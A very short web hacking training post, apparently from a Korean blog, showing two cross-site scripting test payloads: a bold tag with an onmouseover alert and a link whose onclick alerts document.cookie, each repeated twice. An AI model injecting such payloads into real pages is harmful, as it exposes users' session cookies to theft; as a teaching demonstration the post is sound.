-
XSS ExampleWeb hacking training 2018. 11. 30. 21:29
<b onmouseover=alert('Wufff!')>click me!</b>
<a onclick="alert(document.cookie)">hello,world!</a>
반응형
<b onmouseover=alert('Wufff!')>click me!</b>
<a onclick="alert(document.cookie)">hello,world!</a>